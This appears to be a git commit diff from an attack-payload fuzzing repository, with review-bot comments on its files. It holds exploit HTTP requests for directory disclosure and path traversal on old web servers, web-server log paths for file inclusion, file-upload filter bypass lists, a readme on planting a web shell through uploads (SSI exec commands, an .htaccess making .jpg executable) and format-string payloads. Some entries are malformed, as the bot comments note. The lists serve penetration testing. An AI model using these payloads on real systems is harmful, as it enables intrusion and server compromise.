<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file%20 HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/273" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/273</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Netscape Enterprise Server /publisher </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /publisher HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2416" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2416</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Netscape Enterprise Server Win32 8.3 filename </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>Normal Request:</p>
|
||||
<p class=doctext>GET /directory/ HTTP/1.0</p>
|
||||
<p class=doctext>Exploitative Request:</p>
|
||||
<p class=doctext>GET /direct~1/ HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/584" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/584</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Directory Disclosure</span></span><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> <span
|
||||
class=docemphasis1>Vulnerable Application</span> </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>HTTP Request</span></span><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Vulnerability Information</span></span><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Allaire JRun //WEB-INF/ </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET //WEB-INF/ HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/3662" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/3662</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Allaire JRun %3f </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /%3f.jsp HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/3592" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/3592</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Apache Web Server + Mac OS X .DS_Store </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /.DS_Store HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /.<span class=docemphasis1>FBCIndex</span> HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/3316" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/3316</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Apache Web Server Multiview </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /?M=A HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /?S=D HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/3009" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/3009</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Apache Web Server Long Slash </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET <span class=docemphasis1><1 to 4096 '/' characters></span>
|
||||
HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2503" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2503</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Apache Web Server/cgi-bin/test-cgi </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /<span class=docemphasis1>cgi</span>-bin/test-cgi?/*
|
||||
HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /<span class=docemphasis1>cgi</span>-bin/test-cgi?*
|
||||
HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2003" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2003</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>BEA WebLogic /%00/ </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>1. GET /%00/ HTTP/1.0</p>
|
||||
<p class=doctext>2. GET /%2e/ HTTP/1.0</p>
|
||||
<p class=doctext>3. GET /%2f/ HTTP/1.0</p>
|
||||
<p class=doctext>4. GET /%5c/ HTTP/1.0</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2513" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2513</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS 5.0 WebDAV </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>SEARCH / HTTP/1.1</p>
|
||||
<p class=doctext>Host: <span class=docemphasis1><hostname or ip
|
||||
address></span></p>
|
||||
<p class=doctext>Content-Type: text/xml</p>
|
||||
<p class=doctext>Content-Length: 133</p>
|
||||
<p class=doctext><?xml version="1.0"?></p>
|
||||
<p class=doctext><g:searchrequest xmlns:g="DAV:"></p>
|
||||
<p class=doctext><g:sql></p>
|
||||
<p class=doctext>Select "DAV:displayname" from scope()</p>
|
||||
<p class=doctext></g:sql></p>
|
||||
<p class=doctext></g:searchrequest></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1756" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/1756</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Microsoft IIS 3.0/4.0 BDIR.HTR </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /scripts/iisadmin/bdir.htr??c:\HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2280" target="_blank"><span
|
||||
lang=EN-GB style='color:#003399'>http://www.securityfocus.com/bid/2280</span></a></span><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Netscape Enterprise Server INDEX </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>INDEX / HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2285" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2285</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Netscape Enterprise Server /?wp-cs-dump </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext><span lang=EN-GB>1. GET /?wp-cs-dump HTTP/1.0</span></p>
|
||||
<p class=doctext><span lang=EN-GB>2. GET /?wp-ver-info HTTP/1.0</span></p>
|
||||
<p class=doctext><span lang=EN-GB>3. GET /?wp-html-rend HTTP/1.0</span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/1063" target="_blank"><span
|
||||
lang=EN-GB style='color:#003399'>http://www.securityfocus.com/bid/1063</span></a></span><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Oracle Internet Application Server /WebDB/admin_/ </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /WebDB/admin_/ HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/2171" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/2171</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Oracle 9i Application Server mod_plsql </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext><span lang=EN-GB>GET /pls/sample/admin_/help/..%255</span></p>
|
||||
<p class=doctext><span lang=EN-GB>c<span class=docemphasis1><relative path
|
||||
to file></span> HTTP/1.0</span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/3727" target="_blank"><span
|
||||
lang=EN-GB style='color:#003399'>http://www.securityfocus.com/bid/3727</span></a></span><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<p class=MsoNormal><span lang=EN-GB> </span></p>
|
||||
|
||||
</div>
|
||||
|
||||
<!--504690132--><br></body>
|
||||
|
||||
</html>
|
||||
|
|
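Review bot: Three request lines in this table are broken by the markup and will not copy out as valid requests. The BDIR.HTR row reads `bdir.htr??c:\HTTP/1.0` with no space before the protocol version, the mod_plsql row splits `..%255c` across two `<p>` elements as `..%255` and `c`, and the JRun row breaks the servlet class name between `com.livesoftware.jrun` and `plugins.ssi.SSIFilter` with a line break and no joining `.`. Keep each request on one line inside a single paragraph. The third ViewCode.asp request also sits in a separate row with empty first and last cells, so it loses its application name and reference; fold it into the row above.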
@ -0,0 +1,31 @@
|
|||
# based on list by Joseph Giron http://www.wtfchan.org/~evil1/Web-Shells-rev2.pdf
|
||||
/apache/logs/error.log
|
||||
/apache/logs/access.log
|
||||
/apache/logs/error.log
|
||||
/apache/logs/access.log
|
||||
/apache/logs/error.log
|
||||
/apache/logs/access.log
|
||||
/etc/httpd/logs/acces_log
|
||||
/etc/httpd/logs/acces.log
|
||||
/etc/httpd/logs/error_log
|
||||
/etc/httpd/logs/error.log
|
||||
/var/www/logs/access_log
|
||||
/var/www/logs/access.log
|
||||
/usr/local/apache/logs/access_log
|
||||
/usr/local/apache/logs/access.log
|
||||
/var/log/apache/access_log
|
||||
/var/log/apache2/access_log
|
||||
/var/log/apache/access.log
|
||||
/var/log/apache2/access.log
|
||||
/var/log/access_log
|
||||
/var/log/access.log
|
||||
/var/www/logs/error_log
|
||||
/var/www/logs/error.log
|
||||
/usr/local/apache/logs/error_log
|
||||
/usr/local/apache/logs/error.log
|
||||
/var/log/apache/error_log
|
||||
/var/log/apache2/error_log
|
||||
/var/log/apache/error.log
|
||||
/var/log/apache2/error.log
|
||||
/var/log/error_log
|
||||
/var/log/error.log
|
|
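Review bot: The first six entries are the same two paths repeated three times (`/apache/logs/error.log` and `/apache/logs/access.log`), so anything consuming this list issues identical requests. If the repeats were meant to carry different prefixes, restore them; otherwise drop the duplicates. The entries `/etc/httpd/logs/acces_log` and `/etc/httpd/logs/acces.log` also spell `access` with one `s`, unlike every other access-log path in the file, which looks like a typo.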
@ -0,0 +1,8 @@
|
|||
# single directory traversals that have caused showcode or command exec issues in the past
|
||||
# GET /path/*payload*relative/path/to/target/file/
|
||||
..%255c
|
||||
.%5c../..%5c
|
||||
/..%c0%9v../
|
||||
/..%c0%af../
|
||||
/..%255c..%255c
|
||||
|
|
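Review bot: `/..%c0%9v../` contains `%9v`, which is not a valid percent-escape because `v` is not a hexadecimal digit, so a conforming decoder will not turn it into the second byte of an overlong sequence the way it does for the `%c0%af` entry on the next line. The same token appears in the IIS Unicode row of the HTML table added in this commit, so it was probably copied from there. Either correct it to the intended byte or add a comment saying the malformed escape is kept on purpose. The entries are also inconsistent about the leading `/` (`..%255c` and `.%5c../..%5c` have none), which matters for the `/path/*payload*relative/path/to/target/file/` template in the header comment.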
@ -0,0 +1,12 @@
|
|||
# known cross platform source Code, file disclosure attack patterns - append after file or dir path
|
||||
%70
|
||||
.%E2%73%70
|
||||
%2e0
|
||||
%2e
|
||||
.
|
||||
\
|
||||
?*
|
||||
%20
|
||||
%00
|
||||
%2f
|
||||
%5c
|
|
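Review bot: The header comment says every entry is appended after a file or directory path, but `%70` is only a percent-encoded `p` and `.%E2%73%70` carries its own leading dot, so it is unclear whether those two go after the complete name or stand in for part of the extension. Add a one-line comment per entry, or move them to their own list, stating how each is applied. The header wording ("source Code") could be tidied at the same time.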
@ -0,0 +1,3 @@
|
|||
# microsoft-specific appends - try the generic list, too
|
||||
+.htr
|
||||
::DATA$
|
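Review bot: `::DATA$` has the `$` in the wrong place. The stream suffix used elsewhere in this same commit (`{PHPSCRIPT}.php::$DATA` and `{PHPSCRIPT}::$DATA`) is `::$DATA`; change this entry to match so the two lists agree.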
2
attack-payloads/file-upload/alt-extensions-asp.txt
Normal file
|
@ -0,0 +1,2 @@
|
|||
asp
|
||||
aspx
|
|
@ -0,0 +1,4 @@
|
|||
cfm
|
||||
cfml
|
||||
cfc
|
||||
dbm
|
5
attack-payloads/file-upload/alt-extensions-jsp.txt
Normal file
|
@ -0,0 +1,5 @@
|
|||
jsp
|
||||
jspx
|
||||
jsw
|
||||
jsv
|
||||
jspf
|
5
attack-payloads/file-upload/alt-extensions-perl.txt
Normal file
|
@ -0,0 +1,5 @@
|
|||
# .pm .lib cannot be called directly, must be called as modules
|
||||
pl
|
||||
pm
|
||||
cgi
|
||||
lib
|
6
attack-payloads/file-upload/alt-extensions-php.txt
Normal file
|
@ -0,0 +1,6 @@
|
|||
phtml
|
||||
php
|
||||
php3
|
||||
php4
|
||||
php5
|
||||
inc
|
1
attack-payloads/file-upload/alt-extensions.credits.txt
Normal file
|
@ -0,0 +1 @@
|
|||
by Joseph Giron
|
|
@ -0,0 +1,9 @@
|
|||
templates_compiled
|
||||
templates_c
|
||||
templates
|
||||
temporary
|
||||
images
|
||||
cache
|
||||
temp
|
||||
files
|
||||
tmp
|
|
@ -0,0 +1,14 @@
|
|||
{ASPSCRIPT}
|
||||
{ASPSCRIPT};
|
||||
{ASPSCRIPT};.jpg
|
||||
{ASPSCRIPT};.pdf
|
||||
{ASPSCRIPT};.html
|
||||
{ASPSCRIPT};.htm
|
||||
{ASPSCRIPT};.txt
|
||||
{ASPSCRIPT};.xyz
|
||||
{ASPSCRIPT};.zip
|
||||
{ASPSCRIPT};.tgz
|
||||
{ASPSCRIPT};.doc
|
||||
{ASPSCRIPT};.docx
|
||||
{ASPSCRIPT};.xls
|
||||
{ASPSCRIPT};.xlsx
|
11
attack-payloads/file-upload/file-ul-filter-bypass-ms-php.txt
Normal file
|
@ -0,0 +1,11 @@
|
|||
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:
|
||||
# -----
|
||||
#<?php phpinfo(); ?>
|
||||
#-----
|
||||
{PHPSCRIPT}
|
||||
{PHPSCRIPT}.phtml
|
||||
{PHPSCRIPT}.php.html
|
||||
{PHPSCRIPT}.php::$DATA
|
||||
{PHPSCRIPT}.php.php.rar
|
||||
{PHPSCRIPT}.php.rar
|
||||
{PHPSCRIPT}::$DATA
|
|
@ -0,0 +1,3 @@
|
|||
%00index.html
|
||||
;index.html
|
||||
%00
|
|
@ -0,0 +1,9 @@
|
|||
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:
|
||||
# -----
|
||||
# your own payload, or <?php phpinfo(); ?>
|
||||
#-----
|
||||
{PHPSCRIPT}
|
||||
{PHPSCRIPT}.phtml
|
||||
{PHPSCRIPT}.php.html
|
||||
{PHPSCRIPT}.php.php.rar
|
||||
{PHPSCRIPT}.php.rar
|
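Review bot: All five payload lines in this list, along with the exiftool comment block, also appear in `file-ul-filter-bypass-ms-php.txt` earlier in this commit, which differs only by adding the two `::$DATA` entries. Keep the shared entries in one file and leave only the Microsoft-specific ones in the other, the same split the `.htr` append list uses with its "try the generic list, too" comment. The comment block has also drifted between the two copies (`#<?php phpinfo(); ?>` in one, `# your own payload, or <?php phpinfo(); ?>` in the other); pick one wording.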
32
attack-payloads/file-upload/file-ul-filter-bypass.readme
Normal file
|
@ -0,0 +1,32 @@
|
|||
# File Upload Fuzzfile 1.0 - File Name Filter Bypass
|
||||
# creative commons license http://creativecommons.org/licenses/by/3.0/
|
||||
# see:
|
||||
# http://cwe.mitre.org/data/definitions/434.html
|
||||
|
||||
# projurl
|
||||
|
||||
# For MIME filter bypass, your shellscript should look like
|
||||
# -------
|
||||
# GIF89aP;
|
||||
# [shell]
|
||||
# -------
|
||||
#
|
||||
# Check to see if there are no extension checks at all
|
||||
#
|
||||
# Check to see if the file upload protection is client side only.
|
||||
#
|
||||
# For mod_cgi Server Side Include upload attacks:
|
||||
#<!--#exec cmd="ls" -->
|
||||
#
|
||||
#or, on Windows
|
||||
#
|
||||
#<!--#exec cmd="dir" -->
|
||||
#
|
||||
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, if so,
|
||||
# try setting .jpg to executable. If you can set the target directory, try fuzz the
|
||||
# list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.
|
||||
#
|
||||
# example .htaccess that sets mime type .jpg to be executable:
|
||||
# -----
|
||||
# AddType application/x-httpd-php .jpg
|
||||
# -----
|
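Review bot: `# projurl` looks like an unexpanded template token; replace it with the actual project URL or remove the line. The readme also never explains the `{PHPSCRIPT}` and `{ASPSCRIPT}` placeholders that the accompanying lists depend on, so add a line saying what a consumer is expected to substitute for them. "try fuzz the list" in the .htaccess paragraph should read "try fuzzing the list".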
57
attack-payloads/format-strings/format-strings.txt
Normal file
|
@ -0,0 +1,57 @@
|
|||
# derived from fuzz file by Foobar@email.de
|
||||
%s%p%x%d
|
||||
%p%p%p%p
|
||||
%x%x%x%x
|
||||
%d%d%d%d
|
||||
%s%s%s%s
|
||||
%99999999999s
|
||||
%08x
|
||||
%20d
|
||||
%20n
|
||||
%20x
|
||||
%20s
|
||||
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
|
||||
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
|
||||
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
|
||||
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
|
||||
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
|
||||
%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
|
||||
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
|
||||
%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
|
||||
%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
|
||||
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
|
||||
%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
|
||||
%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
|
||||
%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
|
||||
%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
|
||||
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
|
||||
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
|
||||
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
|
||||
XXXXX.%p
|
||||
XXXXX`perl -e 'print ".%p" x 80'`
|
||||
`perl -e 'print ".%p" x 80'`%n
|
||||
%08x.%08x.%08x.%08x.%08x\n
|
||||
XXX0_%08x.%08x.%08x.%08x.%08x\n
|
||||
%.16705u%2\$hn
|
||||
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
|
||||
AAAAA%c
|
||||
AAAAA%d
|
||||
AAAAA%e
|
||||
AAAAA%f
|
||||
AAAAA%I
|
||||
AAAAA%o
|
||||
AAAAA%p
|
||||
AAAAA%s
|
||||
AAAAA%x
|
||||
AAAAA%n
|
||||
ppppp%c
|
||||
ppppp%d
|
||||
ppppp%e
|
||||
ppppp%f
|
||||
ppppp%I
|
||||
ppppp%o
|
||||
ppppp%p
|
||||
ppppp%s
|
||||
ppppp%x
|
||||
ppppp%n
|
||||
|
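Review bot: The two entries that wrap perl -e 'print ".%p" x 80' in backticks only produce the repeated `.%p` string when pasted into a shell; a tool that reads this file line by line will send the perl command text itself. Store the expanded strings instead. The same applies to the `\n` and `\x10\x01\x48\x08` sequences, which are literal backslash characters in a plain text file rather than a newline or raw bytes. Separately, `%I` in `AAAAA%I` and `ppppp%I` is not a standard C conversion specifier on its own, so a comment saying which printf implementation it is aimed at would help.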
467
attack-payloads/http-protocol/docs.http-method-defs.html
Normal file
|
@ -0,0 +1,467 @@
|
|||
<html>
|
||||
|
||||
<head>
|
||||
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
|
||||
<meta name=Generator content="Microsoft Word 10 (filtered)">
|
||||
<title>HTTP/1.1 and HTTP/1.0 Method and Field Definitions</title>
|
||||
|
||||
<style>
|
